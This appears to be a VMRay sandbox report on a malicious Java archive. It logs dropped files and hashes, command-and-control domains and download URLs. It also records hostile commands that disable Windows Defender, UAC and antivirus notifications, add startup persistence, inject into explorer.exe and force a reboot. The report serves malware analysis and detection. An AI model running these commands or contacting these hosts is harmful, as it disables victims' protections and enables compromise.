VMRay Analyzer Report for Sample #866585 VMRay Analyzer 1.11.0 URI localhost Resolved_To Address 127.0.0.1 Process 2924 java.exe 1264 java.exe "C:\Program Files\Java\jre1.8.0_92\bin\java.exe" -jar "C:\Users\DSsDPMx042\Desktop\Duplicata0.jar" C:\Users\DSsDPMx042\Desktop c:\program files\java\jre1.8.0_92\bin\java.exe Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Opened Opened Opened Created Opened Opened Read_From Read_From Connected_To Connected_To Connected_To Process 3064 regsvr32.exe 2924 regsvr32.exe regsvr32.exe /s \"C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E\" #96 C:\Users\DSsDPMx042\Desktop c:\windows\system32\regsvr32.exe File program files\java\jre1.8.0_92\lib\rt.jar program files\java\jre1.8.0_92\lib\rt.jar c:\ c:\program files\java\jre1.8.0_92\lib\rt.jar jar File program files\java\jre1.8.0_92\lib\ext\meta-index program files\java\jre1.8.0_92\lib\ext\meta-index c:\ c:\program files\java\jre1.8.0_92\lib\ext\meta-index 0_92\lib\ext\meta-index File users\dssdpmx042\.oracle_jre_usage\90737d32e3abaa4.timestamp users\dssdpmx042\.oracle_jre_usage\90737d32e3abaa4.timestamp c:\ c:\users\dssdpmx042\.oracle_jre_usage\90737d32e3abaa4.timestamp timestamp MD5 9fffd4e723eebc43d03333c1a4413ab4 SHA1 5a93ce0f655c05c5318bfbdb488e6eceaf29d96e SHA256 48d355d323548fb06decc335335b6deb3155b593756826c6771ff9d25743ea63 File users\dssdpmx042\desktop\duplicata0.jar users\dssdpmx042\desktop\duplicata0.jar c:\ c:\users\dssdpmx042\desktop\duplicata0.jar jar File program files\java\jre1.8.0_92\lib\meta-index program files\java\jre1.8.0_92\lib\meta-index c:\ c:\program files\java\jre1.8.0_92\lib\meta-index 0_92\lib\meta-index File program files\java\jre1.8.0_92\lib\security\java.security program files\java\jre1.8.0_92\lib\security\java.security c:\ c:\program files\java\jre1.8.0_92\lib\security\java.security security File users\public\n3eg\id users\public\n3eg\id c:\ c:\users\public\n3eg\id MD5 97558baebf6eb308ff83d8fe474e294a SHA1 954cfe56df08de38d177d12bab69170cf1674b03 SHA256 7a788184a2507c5de3f4cfc973810695d3ca41e29c6e90a21f87d419e1601c94 File users\public\n3eg\idw users\public\n3eg\idw c:\ c:\users\public\n3eg\idw MD5 26657d5ff9020d2abefe558796b99584 SHA1 6fb84aed32facd1299ee1e77c8fd2b1a6352669e SHA256 7b1a278f5abe8e9da907fc9c29dfd432d60dc76e17b0fabab659d2a508bc65c4 File program files\java\jre1.8.0_92\lib\net.properties program files\java\jre1.8.0_92\lib\net.properties c:\ c:\program files\java\jre1.8.0_92\lib\net.properties properties File users\public\n3eg\n3eg1.zip users\public\n3eg\n3eg1.zip c:\ c:\users\public\n3eg\n3eg1.zip zip MD5 16dbf6ce67e389a442ce8d032637654d SHA1 0b4068e0d543bb6cd9e549df207a3069a7e18388 SHA256 555a58f9a1d235b075fa645a058a5b93215bd27432a4c8e120f4310eb8655c47 File users\public\n3eg\n3eg2.zip users\public\n3eg\n3eg2.zip c:\ c:\users\public\n3eg\n3eg2.zip zip MD5 7088647800a215d2d77570ff3f999e74 SHA1 aad42e745069e801900a01f1fd897b82067f988e SHA256 572d8553fc28c6cdd680aa782cd73d2e6cbd7316145f060a3986a7ce0e40515e File users\public\n3eg\n3eg4.zip users\public\n3eg\n3eg4.zip c:\ c:\users\public\n3eg\n3eg4.zip zip MD5 d5a2e7e6f866f119cd9fe3b3d6232acc SHA1 8af3b0406e8e6780cea28a603f46ef2eec7d2b9f SHA256 09973947c6b59a27d5adf9ce1d0b2edf342a18ae746d58dec72cc24b31d46a59 File users\public\n3eg\ljkg4 users\public\n3eg\ljkg4 c:\ c:\users\public\n3eg\ljkg4 MD5 9c413a78860adeb716ce3a6c9c90aeb3 SHA1 3b12a0e1afae98db7e665ea6bc45b1c7bf875b30 SHA256 8be47f70911221c257dd2def3ce76a1d4db6d26685de6fbc16409baeb8ba8722 File users\public\n3eg\ljkg1 users\public\n3eg\ljkg1 c:\ c:\users\public\n3eg\ljkg1 MD5 8eaa07e05c7f46d1c2949d11c9ba645d SHA1 1dc6bc4043ce00b856bfe462147064b34ae16dc2 SHA256 866218b20d0ebcae237e288cf8616d7a9293c974a1df14ec8f7c37b7ee0dd7e4 File users\public\n3eg\ljkg2 users\public\n3eg\ljkg2 c:\ c:\users\public\n3eg\ljkg2 MD5 23adce0295127671e5bc3c4c9d1e2eb7 SHA1 cf28f7c38c1a3e17458e6b7eb1dc38baef72d290 SHA256 7cfbfff8aaf3bd0cc707e61a075a1f45644f422f9d1c55573edec637c27b6534 File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE File STD_INPUT_HANDLE File users\public\n3eg users\public\n3eg c:\ c:\users\public\n3eg File Anonymous pipe File Program Files\Java\jre1.8.0_92\bin\client\jvm.dll Program Files\Java\jre1.8.0_92\bin\client\jvm.dll C:\ C:\Program Files\Java\jre1.8.0_92\bin\client\jvm.dll dll DNSRecord N3EErvtwsM URI N3EErvtwsM DNSRecord adom2.com.br URI adom2.com.br SocketAddress 80 TCP NetworkSocket 80 TCP Contains SocketAddress 80 NetworkConnection HTTP 80 URI http://None/nosoanfhtympkl50tre/ljk32g1.txt Contains URI none Process 3064 regsvr32.exe 2924 regsvr32.exe regsvr32.exe /s \"C:\\Users\\Public\\N3Eg\\N3Eg2.51N3E\" #96 C:\Users\DSsDPMx042\Desktop c:\windows\system32\regsvr32.exe Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 1264 explorer.exe 18446744073709551615 explorer.exe C:\Windows\Explorer.EXE C:\Windows\system32 c:\windows\explorer.exe WinRegistryKey Software\Embarcadero\Locales HKEY_CURRENT_USER WinRegistryKey Software\Embarcadero\Locales HKEY_LOCAL_MACHINE WinRegistryKey Software\CodeGear\Locales HKEY_CURRENT_USER WinRegistryKey Software\CodeGear\Locales HKEY_LOCAL_MACHINE WinRegistryKey Software\Borland\Locales HKEY_CURRENT_USER WinRegistryKey Software\Borland\Delphi\Locales HKEY_CURRENT_USER File Users\Public\N3Eg\N3Eg2.51N3E Users\Public\N3Eg\N3Eg2.51N3E C:\ C:\Users\Public\N3Eg\N3Eg2.51N3E 51N3E File Windows\system32\regsvr32.exe Windows\system32\regsvr32.exe C:\ C:\Windows\system32\regsvr32.exe exe Process 1264 explorer.exe 18446744073709551615 explorer.exe C:\Windows\Explorer.EXE C:\Windows\system32 c:\windows\explorer.exe Created Created Created Created Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Read_From Read_From Read_From Read_From Read_From Connected_To Connected_To Connected_To Process cmd /k "C:\Users\Public\N3Eg\N3E.vbs" File users\public\n3eg\n3eg1.51n3e users\public\n3eg\n3eg1.51n3e c:\ c:\users\public\n3eg\n3eg1.51n3e 51n3e File users\public\n3eg\wvs users\public\n3eg\wvs c:\ c:\users\public\n3eg\wvs MD5 f4314bbaf858170dd3b5d1610b3370fa SHA1 fb456dcb16fcac006136471acaf71089398f2063 SHA256 45e26aeb4a0e45265193e9293e88a93d9b3c89af4e401cb1812161c4568d0b51 File users\public\n3eg\idw users\public\n3eg\idw c:\ c:\users\public\n3eg\idw File users\public\n3eg\idx users\public\n3eg\idx c:\ c:\users\public\n3eg\idx MD5 a26185275591cd0849899d86349265a0 SHA1 209b5d24d976b7399dd37ee9669c312ddc3da214 SHA256 7361213f5c9ebbdf90b6865202c7f02607e3d57ec9b070448dba250bef7061f4 File users\public\n3eg\n3e.vbs users\public\n3eg\n3e.vbs c:\ c:\users\public\n3eg\n3e.vbs vbs MD5 519b80fd9d6073f6034820a5c0f0241c SHA1 5d7d06d0b1100817dfccf7c87c824650da296fc1 SHA256 7ac2bab32a34ef844ac2a63864db4d238011723b81f4072f22b148a4535a56d8 File users\public\n3eg\id users\public\n3eg\id c:\ c:\users\public\n3eg\id WinRegistryKey Software\Borland\Locales HKEY_CURRENT_USER WinRegistryKey Software\Borland\Locales HKEY_LOCAL_MACHINE WinRegistryKey Software\Borland\Delphi\Locales HKEY_CURRENT_USER WinRegistryKey Software\Embarcadero\Locales HKEY_CURRENT_USER WinRegistryKey Software\Embarcadero\Locales HKEY_LOCAL_MACHINE WinRegistryKey Software\CodeGear\Locales HKEY_CURRENT_USER WinRegistryKey Software\CodeGear\Locales HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes HKEY_LOCAL_MACHINE MS Shell Dlg 2 MS Shell Dlg 2 WinRegistryKey System\CurrentControlSet\Control\Keyboard Layouts\04090409 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER xacwe regsvr32.exe /s "C:\Users\Public\N3Eg\N3Eg2.51N3E" #96 REG_SZ WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE File Users\Public\N3Eg\N3Eg4.51N3E Users\Public\N3Eg\N3Eg4.51N3E C:\ C:\Users\Public\N3Eg\N3Eg4.51N3E 51N3E File Windows\Explorer.EXE Windows\Explorer.EXE C:\ C:\Windows\Explorer.EXE EXE File DNSRecord carvas32ltda.com URI carvas32ltda.com DNSRecord carva32ssa.com URI carva32ssa.com DNSRecord bandeivacomercial.com URI bandeivacomercial.com DNSRecord bandeivacomercio.com URI bandeivacomercio.com DNSRecord adom2.com.br SocketAddress 187.191.100.112 80 TCP NetworkSocket 187.191.100.112 80 TCP Contains SocketAddress 127.0.0.1 80 NetworkConnection HTTP 127.0.0.1 80 URI http://127.0.0.1/nosoanfhtympkl50tre/infx/s1/conta.php?chave=s3n4&url=N3EERVTWSM%20*%20%2032%20bits%20*%202626.5%20kb%20*%20%20*%20English%20(United%20States) Contains URI 127.0.0.1 Process 3832 cmd.exe 1264 cmd.exe cmd /k "C:\Users\Public\N3Eg\N3E.vbs" C:\Windows\system32 c:\windows\system32\cmd.exe Opened Created Opened Opened Opened Opened Opened Opened Process 3832 cmd.exe 1264 cmd.exe cmd /k "C:\Users\Public\N3Eg\N3E.vbs" C:\Windows\system32 c:\windows\system32\cmd.exe Process C:\Users\Public\N3Eg\N3E.vbs File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE WinRegistryKey Software\Policies\Microsoft\Windows\System HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun WinRegistryKey Software\Microsoft\Command Processor HKEY_CURRENT_USER DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun File Windows\system32\cmd.exe Windows\system32\cmd.exe C:\ C:\Windows\system32\cmd.exe exe File users\public\n3eg\n3e.vbs users\public\n3eg\n3e.vbs c:\ c:\users\public\n3eg\n3e.vbs vbs Process 3880 wscript.exe 3832 wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\N3Eg\N3E.vbs" C:\Windows\system32 c:\windows\system32\wscript.exe Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_CURRENT_USER Enabled WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_LOCAL_MACHINE IgnoreUserSettings Enabled WinRegistryKey .vbs HKEY_CLASSES_ROOT WinRegistryKey VBSFile\ScriptEngine HKEY_CLASSES_ROOT WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_LOCAL_MACHINE IgnoreUserSettings LogSecuritySuccesses WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_CURRENT_USER LogSecuritySuccesses WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_LOCAL_MACHINE IgnoreUserSettings TrustPolicy UseWINSAFER WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_CURRENT_USER TrustPolicy UseWINSAFER WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_LOCAL_MACHINE Timeout DisplayLogo WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_CURRENT_USER Timeout DisplayLogo File Windows\System32\WScript.exe Windows\System32\WScript.exe C:\ C:\Windows\System32\WScript.exe exe Process 3880 wscript.exe 3832 wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\N3Eg\N3E.vbs" C:\Windows\system32 c:\windows\system32\wscript.exe Process 1172 wscript.exe 3880 wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\N3Eg\N3E.vbs" uac C:\Windows\system32 c:\windows\system32\wscript.exe Created Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Created Created Created Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Modified_Properties_Of Opened Opened Process sc Process net Process cmd File users\public\n3eg\n3e.vbs users\public\n3eg\n3e.vbs c:\ c:\users\public\n3eg\n3e.vbs vbs WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_CURRENT_USER Enabled WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_LOCAL_MACHINE IgnoreUserSettings Enabled WinRegistryKey .vbs HKEY_CLASSES_ROOT WinRegistryKey VBSFile\ScriptEngine HKEY_CLASSES_ROOT WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_CURRENT_USER LogSecuritySuccesses WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_LOCAL_MACHINE LogSecuritySuccesses WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_LOCAL_MACHINE IgnoreUserSettings TrustPolicy UseWINSAFER WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_CURRENT_USER TrustPolicy UseWINSAFER WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_LOCAL_MACHINE Timeout DisplayLogo WinRegistryKey Software\Microsoft\Windows Script Host\Settings HKEY_CURRENT_USER Timeout DisplayLogo WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System HKEY_LOCAL_MACHINE EnableLUA 0 REG_DWORD_LITTLE_ENDIAN WinRegistryKey Software\Microsoft\Internet Explorer\Download HKEY_CURRENT_USER CheckExeSignatures no REG_SZ WinRegistryKey Software\Microsoft\Security Center HKEY_LOCAL_MACHINE AntiVirusDisableNotify 1 REG_DWORD_LITTLE_ENDIAN WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System HKEY_LOCAL_MACHINE ConsentPromptBehaviorAdmin 0 REG_DWORD_LITTLE_ENDIAN WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System HKEY_LOCAL_MACHINE PromptOnSecureDesktop 0 REG_DWORD_LITTLE_ENDIAN WinRegistryKey Software\Microsoft\Internet Explorer\Download HKEY_CURRENT_USER RunInvalidSignatures 00000001 REG_SZ WinRegistryKey Software\Microsoft\Security Center HKEY_LOCAL_MACHINE UpdatesDisableNotify 1 REG_DWORD_LITTLE_ENDIAN File Windows\System32\wscript.exe Windows\System32\wscript.exe C:\ C:\Windows\System32\wscript.exe exe Process 1172 wscript.exe 3880 wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\N3Eg\N3E.vbs" uac C:\Windows\system32 c:\windows\system32\wscript.exe File STD_OUTPUT_HANDLE Process 2400 sc.exe 1172 sc.exe "C:\Windows\System32\sc.exe" config WinDefend start= disabled C:\Windows\system32 c:\windows\system32\sc.exe Opened Opened WinService WinDefend File STD_OUTPUT_HANDLE Process 2492 net1.exe 1712 net1.exe C:\Windows\system32\net1 localgroup HomeUsers /delete DSsDPMx042 C:\Windows\system32 c:\windows\system32\net1.exe Opened Opened Opened File STD_ERROR_HANDLE File Windows\system32\net1.exe Windows\system32\net1.exe C:\ C:\Windows\system32\net1.exe exe Process 1692 cmd.exe 1172 cmd.exe "C:\Windows\System32\cmd.exe" /k echo a > "C:\Users\Public\N3Eg\uc" C:\Windows\system32 c:\windows\system32\cmd.exe Opened Opened Opened Opened Opened Opened Opened Opened Process 1692 cmd.exe 1172 cmd.exe "C:\Windows\System32\cmd.exe" /k echo a > "C:\Users\Public\N3Eg\uc" C:\Windows\system32 c:\windows\system32\cmd.exe File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE File users\public\n3eg\uc users\public\n3eg\uc c:\ c:\users\public\n3eg\uc MD5 27ff7ea9ce50076cfc8e794d64957f7c SHA1 d765803318ad03df1a1fbdc66fd542945dd81a84 SHA256 885fa5c5cb5f80fdb414f1b3e0b94c4b1366db1ce83e82358c4cb67da2ab73e4 WinRegistryKey Software\Policies\Microsoft\Windows\System HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun WinRegistryKey Software\Microsoft\Command Processor HKEY_CURRENT_USER DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun File Windows\System32\cmd.exe Windows\System32\cmd.exe C:\ C:\Windows\System32\cmd.exe exe Process 1632 cmd.exe 1172 cmd.exe "C:\Windows\System32\cmd.exe" /k shutdown -r -t 0 -f C:\Windows\system32 c:\windows\system32\cmd.exe Opened Created Opened Opened Opened Opened Opened Opened Opened Process 1632 cmd.exe 1172 cmd.exe "C:\Windows\System32\cmd.exe" /k shutdown -r -t 0 -f C:\Windows\system32 c:\windows\system32\cmd.exe Process 2540 shutdown.exe 1632 shutdown.exe shutdown -r -t 0 -f C:\Windows\system32 c:\windows\system32\shutdown.exe File users\public\n3eg\uc users\public\n3eg\uc c:\ c:\users\public\n3eg\uc File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE WinRegistryKey Software\Policies\Microsoft\Windows\System HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun WinRegistryKey Software\Microsoft\Command Processor HKEY_CURRENT_USER DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun Process 1396 regsvr32.exe 1136 regsvr32.exe "C:\Windows\System32\regsvr32.exe" /s "C:\Users\Public\N3Eg\N3Eg2.51N3E" #96 C:\Windows\system32 c:\windows\system32\regsvr32.exe Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 1136 explorer.exe 1128 explorer.exe C:\Windows\Explorer.EXE C:\Windows\system32 c:\windows\explorer.exe WinRegistryKey Software\Embarcadero\Locales HKEY_CURRENT_USER WinRegistryKey Software\Embarcadero\Locales HKEY_LOCAL_MACHINE WinRegistryKey Software\CodeGear\Locales HKEY_CURRENT_USER WinRegistryKey Software\CodeGear\Locales HKEY_LOCAL_MACHINE WinRegistryKey Software\Borland\Locales HKEY_CURRENT_USER WinRegistryKey Software\Borland\Delphi\Locales HKEY_CURRENT_USER File Windows\System32\regsvr32.exe Windows\System32\regsvr32.exe C:\ C:\Windows\System32\regsvr32.exe exe File users\public\n3eg\n3eg1.51n3e users\public\n3eg\n3eg1.51n3e c:\ c:\users\public\n3eg\n3eg1.51n3e 51n3e Process 1136 explorer.exe 1128 explorer.exe C:\Windows\Explorer.EXE C:\Windows\system32 c:\windows\explorer.exe Created Created Deleted Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Read_From Read_From Read_From Read_From Connected_To File users\public\n3eg\wvs users\public\n3eg\wvs c:\ c:\users\public\n3eg\wvs File users\public\n3eg\n3e.vbs users\public\n3eg\n3e.vbs c:\ c:\users\public\n3eg\n3e.vbs vbs WinRegistryKey Software\Borland\Locales HKEY_CURRENT_USER WinRegistryKey Software\Borland\Locales HKEY_LOCAL_MACHINE WinRegistryKey Software\Borland\Delphi\Locales HKEY_CURRENT_USER WinRegistryKey Software\Embarcadero\Locales HKEY_CURRENT_USER WinRegistryKey Software\Embarcadero\Locales HKEY_LOCAL_MACHINE WinRegistryKey Software\CodeGear\Locales HKEY_CURRENT_USER WinRegistryKey Software\CodeGear\Locales HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes HKEY_LOCAL_MACHINE MS Shell Dlg 2 MS Shell Dlg 2 WinRegistryKey System\CurrentControlSet\Control\Keyboard Layouts\04090409 HKEY_LOCAL_MACHINE DNSRecord carvas32ltda.com DNSRecord carva32ssa.com DNSRecord bandeivacomercial.com DNSRecord bandeivacomercio.com Analyzed Sample #866585 Malware Artifacts 866585 Sample-ID: #866585 Job-ID: #4875347 Duplicata0.jar reboot Job-ID: #4875347 This sample was analyzed by VMRay Analyzer 1.11.0 on a Windows 7 system 94 VTI Score based on VTI Database Version 2.3 Metadata of Sample File #866585 Submission-ID: #866585 C:\Users\DSsDPMx042\Desktop\Duplicata0.jar jar MD5 53e9f702c6ca434311cc05f09acf1923 SHA1 fba04d13da22168a6f6d0e0a9d893b0938d4abbf SHA256 a2b467819bd03974f8b4ac326d9d488eb80680ee43cea984e160922122f1f048 Opened_By VMRay Analyzer Network VTI rule match with VTI rule score 1/5 vmray_request_dns_by_name Resolve "N3EErvtwsM". Perform DNS request Network VTI rule match with VTI rule score 1/5 vmray_request_dns_by_name Resolve "adom2.com.br". Perform DNS request Process VTI rule match with VTI rule score 1/5 vmray_create_process_with_hidden_window The process "regsvr32.exe \s \"C:\Users\Public\N3Eg\N3Eg2.51N3E\" #96" starts with hidden window. Create process with hidden window Anti Analysis VTI rule match with VTI rule score 1/5 vmray_dynamic_api_usage_by_api Resolve more than 50 APIs. Dynamic API usage Process VTI rule match with VTI rule score 1/5 vmray_allocate_wx_page Allocate a page with "PAGE_EXECUTE_READWRITE" permissions, often used to dynamically unpack code. Allocate a page with write and execute permissions Anti Analysis VTI rule match with VTI rule score 1/5 vmray_delay_execution_by_sleep One thread sleeps more than 5 minutes. Delay execution Persistence VTI rule match with VTI rule score 1/5 vmray_install_startup_script_by_registry Add "regsvr32.exe /s "C:\Users\Public\N3Eg\N3Eg2.51N3E" #96" to windows startup via registry. Install system startup script or application Network VTI rule match with VTI rule score 1/5 vmray_request_dns_by_name Resolve "carvas32ltda.com". Perform DNS request Network VTI rule match with VTI rule score 1/5 vmray_request_dns_by_name Resolve "carva32ssa.com". Perform DNS request Network VTI rule match with VTI rule score 1/5 vmray_request_dns_by_name Resolve "bandeivacomercial.com". Perform DNS request Network VTI rule match with VTI rule score 1/5 vmray_request_dns_by_name Resolve "bandeivacomercio.com". Perform DNS request Process VTI rule match with VTI rule score 1/5 vmray_create_process_with_hidden_window The process "cmd /k "C:\Users\Public\N3Eg\N3E.vbs"" starts with hidden window. Create process with hidden window OS VTI rule match with VTI rule score 3/5 vmray_disable_uac_notification_by_registry Disable UAC notification. Modfiy system security configuration Browser VTI rule match with VTI rule score 4/5 vmray_ie_disable_exe_signature_check Disable signature check for executables downloaded by Microsoft Internet Explorer. Change security related browser settings OS VTI rule match with VTI rule score 3/5 vmray_disable_security_center_av_notifications_by_registry Disable Windows Security Center antivirus notification. Modfiy system security configuration OS VTI rule match with VTI rule score 3/5 vmray_disable_security_center_warning_about_updates_by_registry Disable Windows Security Center warning about disabled system updates. Modfiy system security configuration Process VTI rule match with VTI rule score 1/5 vmray_create_process_with_hidden_window The process "sc" starts with hidden window. Create process with hidden window Process VTI rule match with VTI rule score 1/5 vmray_create_process_with_hidden_window The process "net" starts with hidden window. Create process with hidden window OS VTI rule match with VTI rule score 3/5 vmray_disable_system_service Disable "Windows Defender Service" by ChangeServiceConfigW. Disable crucial system service Process VTI rule match with VTI rule score 1/5 vmray_create_process_with_hidden_window The process "cmd" starts with hidden window. Create process with hidden window Injection VTI rule match with VTI rule score 3/5 vmray_modify_memory "c:\windows\system32\regsvr32.exe" modifies memory of "c:\windows\explorer.exe" Write into memory of an other process Injection VTI rule match with VTI rule score 3/5 vmray_create_remote_thread "c:\windows\system32\regsvr32.exe" creates thread in "c:\windows\explorer.exe" Modify control flow of an other process Network VTI rule match with VTI rule score 1/5 vmray_tcp_out_connection Outgoing TCP connection to host "None:80". Connect to remote host Network VTI rule match with VTI rule score 1/5 vmray_tcp_out_connection Outgoing TCP connection to host "187.191.100.112:80". Connect to remote host Network VTI rule match with VTI rule score 1/5 vmray_download_data_http_request Url "http://None/nosoanfhtympkl50tre/ljk32g1.txt". Download data Network VTI rule match with VTI rule score 1/5 vmray_download_data_http_request Url "http://None/nosoanfhtympkl50tre/ljk32g2.txt". Download data Network VTI rule match with VTI rule score 1/5 vmray_download_data_http_request Url "http://None/nosoanfhtympkl50tre/ljk32g4.txt". Download data Network VTI rule match with VTI rule score 1/5 vmray_download_data_http_request Url "http://127.0.0.1/nosoanfhtympkl50tre/infx/s1/conta.php?chave=s3n4&url=N3EERVTWSM%20*%20%2032%20bits%20*%202626.5%20kb%20*%20%20*%20English%20(United%20States)". Download data Network VTI rule match with VTI rule score 1/5 establish_http_connection Remote address "None". Connect to HTTP server Network VTI rule match with VTI rule score 1/5 establish_http_connection Remote address "127.0.0.1". Connect to HTTP server PE VTI rule match with VTI rule score 1/5 vmray_drop_pe_file Drop file "c:\users\public\n3eg\ljkg4". Drop PE file PE VTI rule match with VTI rule score 1/5 vmray_drop_pe_file Drop file "c:\users\public\n3eg\ljkg2". Drop PE file